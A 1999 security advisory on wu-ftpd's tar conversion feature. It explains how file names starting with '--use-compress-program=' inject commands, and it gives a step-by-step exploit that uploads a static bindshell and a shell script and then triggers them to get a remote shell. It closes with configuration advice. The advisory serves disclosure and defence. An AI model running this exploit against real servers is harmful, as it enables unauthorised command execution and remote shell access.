FTP conversions on misconfigured systems (specifically wu-ftpd) posses a security threat
21 Dec. 1999
Summary
There is a vulnerability with certain configurations of certain ftp daemons with which users with a valid ftp only account may execute arbitrary commands (including self-supplied binaries). It is also possible for anonymous ftp users to execute arbitrary commands (again, including self-supplied binaries).
FTP Conversion is the name given to the process whereby a user can convert/archive/compress data on the fly when retrieving files from a FTP server. This is done when the FTP user requests a filename and appends .tar/.tar.gz/.Z/.gz to the filename. The FTP then opens a pipe through the requested binary (/bin/tar for example) and sends the file through this pipe to the user.
Vulnerability:
If a malicious user constructs a filename beginning with a '-' sign it is possible to pass arbitrary flags to the command invoked by FTPD. If the user also includes spaces in this filename, they may pass further arguments. Modern tar implementations include some fairly interesting arguments.
From the tar(1) man page:
--use-compress-program PROG
filter the archive through PROG (which must accept -d)
So it can be seen quite obviously that the flag:
--use-compress-program=id
Will invoke the id command as a compression program for tar to filter through, obviously failing in the process, but trying nonetheless.
Using this mechanism it is possible to invoke any command in the path. It is also, as mentioned previously, possible to pass those commands further arguments.
Impact:
The impact of this bug is that users who may not have the ability to execute commands otherwise may execute arbitrary commands within the path. If those commands can be coaxed into running other commands, a user may manage an interactive shell. This may be restricted by the default behavior of wu-ftpd to chroot() the anonymous ftp user. However it is still possible for users to upload their own binaries and use the compromised FTP server for:
- launching attacks on your internal network which they may not have had the ability to do previously due to ACL's etc.
- launching denial of service attacks on other sites from your FTP server.
- taking part in distributed attacks, or distributed denial service attacks, using your compromised FTP server
Exploit:
This vulnerability is simple to exploit. However to exploit it you must be able to upload/download files. (e.g. a mode 0777 incoming directory).
For the purposes of this exploit you also need a shell in the remote path. For example, a RedHat machine with the anonftp package installed has exactly what you need.
First, assuming you are running the same platform as your target, statically compile some sort of backdoor program. A simple example is bindshell.c.
$ gcc bindshell.c -o b -static
Then, tar this up. You will need to tar it up because the remote side will rarely have the ability to change permissions at this stage. (SITE CHMOD rarely works on anonymous ftp sites)
$ tar -cf b.tar b
Create a script of things you want to do on the remote site, this will be interpreted by bash or sh.
$ cat > blah
#
/bin/tar -xf b.tar
./b
^D
Leave the first line as a comment.
Create a empty file called "--use-compress-program=sh blah"
$ > "--use-compress-program=sh blah"
Connect to your target ftp server.
$ ftp localhost
Connected to localhost.
220 localhost.localdomain FTP server (Version wu-2.6.0(1) Tue Sep 21 10:10:10 EDT 2000) ready.
Name (localhost:suid): ftp
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Change to your world writeable directory:
ftp> cd /incoming
Store your files:
ftp> put blah
ftp> put b.tar
ftp> put "--use-compress-program=sh blah"
Now using TAR conversion, get your "--use-compress-program=sh blah" file.
ftp> get "--use-compress-program=sh blah".tar
It should open a connection then freeze. Now telnet to your bindshell port.
Recommendations:
WU-FTPD have taken the stance that because this vulnerability is more a configuration issue than anything else, they do not plan on releasing a patch.
You would be wise to evaluate the need for anonymous ftp on your server and remove the ability if possible.
If you require anonymous ftp access, ensure there are no world writeable directories, also ensure that the smallest amount of commands you can get away with exist in the ~ftp/bin directory.
